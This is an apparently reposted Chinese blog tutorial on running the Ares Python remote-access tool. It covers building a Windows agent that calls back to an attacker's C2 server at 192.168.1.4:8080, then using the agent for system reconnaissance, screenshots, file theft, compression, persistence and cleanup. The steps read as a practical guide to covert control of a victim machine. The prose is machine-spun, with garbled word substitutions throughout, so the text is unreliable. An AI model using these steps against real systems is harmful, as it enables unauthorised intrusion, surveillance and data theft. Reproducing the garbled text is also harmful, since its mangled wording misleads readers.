• SEO文章推广! 合作联系qq:122325244 正式全面改版 !免费SEO地址:https://www.seozhan.cn/tool 站长QQ群
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏SEO站长博客吧

基于Python的BS远控Ares实战

脚本编程 SEO站长博客 2个月前 (08-01) 38次浏览 已收录 0个评论

摘要

本文咱们将练习若何利用 Ares 这个器材。Ares 是一个基于 Python 的 B/S 远控器材,Server 端利用 Flask 举行斥地,完全正在浏览器就可能轻松操作。它运转正在受熏染的主机上,并确保 CNC 通讯的亨通。该项目要紧归功于 Kevin Locati,你可能正在 GitHub 上找到它。

关于本文中的演示,我将利用以下编制境遇:

攻击者:Kali Linux

宗旨:Windows 10

   安设

起首,咱们需求正在攻击者机械上安设器材咱们直接从 GitHub 克隆它。实行后,咱们通过 cd 下令遍历新创筑的名为 Ares 的目次,如下所示。

   git clonecd Ares ls

接下来,为了使器材可能平常办事,咱们还需求安设极少依赖项。安设requirements.txt 文献即可,该文献包蕴了需求安设的 python 库的周密音信。

   pip install -r requirements.txt

由于咱们的宗旨是 Windows 机械,于是咱们需求编译与 Windows 机械兼容的 agent。为此,咱们需求先来安设wine。这里或者需求花费极少时光。

   ls ./wine_setup.sh 宗旨诈骗

至此,咱们已凯旋安设了运转 Ares 所需的全体前提。接下来咱们就可能后测验获取与宗旨机械的 CNC 会话了。思要到达这个方针,咱们还需求一个 agent。咱们利用 cd 下令遍历 agent 目次。然后通过 ls 下令列出文献,找到个中的一个装备文献。咱们需求编辑该文献以获取会话。

   cd agent/ ls nano config.py

可能看到,当咱们利用 nano 下令翻开装备文献后,个中的 SERVER 变量处有一个 IP 地方。咱们编辑并将其更改为攻击者机械的内网 IP 地方,这里以我的 IP(192.168.1.4)为例。其他参数值咱们无需修削,存在并退出 nano 编辑器。

config 文献装备实行后,下面咱们来创筑一个代劳。由于咱们的宗旨机械是 Windows,因此咱们将利用以下下令创筑一个 Windows 的代劳。

   ./builder.py -p Windows –server //192.168.1.4:8080 -o agent.exe

创筑实行后你可能选拔一种你热爱的办法,将这个代剪发送到宗旨阴谋机上。之后,咱们需求启动供职器。这是必要的,由于代劳将与该供职器通讯。让咱们回到 Ares 目次。这里有一个名为 server 的子目次。正在遍历它之后,咱们需求初始化数据库(仅正在第一次利用时需求初始化数据库),由于咱们将利用 initdb 参数。现正在,咱们将运转供职器如下图所示。

   ls cd server/ ./ares.py initdb ./ares.py runserver -h 0.0.0.0 -p 8080 –threaded

现正在,咱们正在浏览器中导航到供职器 IP。你将看到一个外单,央求咱们设备一个暗号。输入实行后,单击“Define”陆续。

接着,会央求咱们输入方才设备的暗号举行登录。

这里咱们可能看到 Ares GUI 的几个主索引,蕴涵:Change Password,Disconnect,Agent List。现正在,让咱们回到创筑代劳的那步。只要正在宗旨机械上施行代劳后,咱们才会正在 Agent List 中获取一个 Agent。

正如下图中所示,咱们有一个存活的 agent。咱们可能看到代劳的名称,形态,代劳上线时登录的用户,同样咱们也有主机名。咱们还获取到了宗旨的 IP 和编制类型。这里,咱们可能正在众个设置上运转代劳,每个设置都可能正在这里被查看到。咱们可能从这里选拔会话,同时正在众个会话上施行相似的下令。让咱们点击名称陆续。

   下令施行

让咱们先来运转一个 systeminfo 下令看看。如下所示,咱们获取到了宗旨机械的全体编制装备音信。

   systeminfo 截屏

现正在,让咱们来测验截取宗旨机械的屏幕。输入屏幕截取下令,代劳将缉捕屏幕截图并供应如图所示的链接。翻开该链接,咱们就可能查看到最新的屏幕截图。

   screenshot 文献下载

咱们还可能利用该代劳从长途宗旨下载文献。思要下载文献必要要清楚文献名,咱们可能利用 dir 下令获取文献名。清楚文献名后,咱们就可能将相应的文献下载到咱们当地的攻击机上,如下图所示。

   download file.txt 压缩文献

咱们可能利用 Ares agent 压缩长途宗旨上的目次。同样需求目次名。提取目次名后,咱们可能利用以下下令长途压缩文献。这里的’sample’是目次的名称,’compressed.zip’是压缩文献的名称。

   zip compressed.zip sample 悠久化代劳

咱们可能利用 persist 下令来移用代劳中的 persistence。该下令会正在长途宗旨上安设代劳。

   persist Clean Up

终末使命实行后,咱们可能利用 clean 下令从宗旨阴谋机中删除代劳。

   clean


SEO站长博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:基于Python的BS远控Ares实战
喜欢 (0)
[h4ck3st@126.com]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址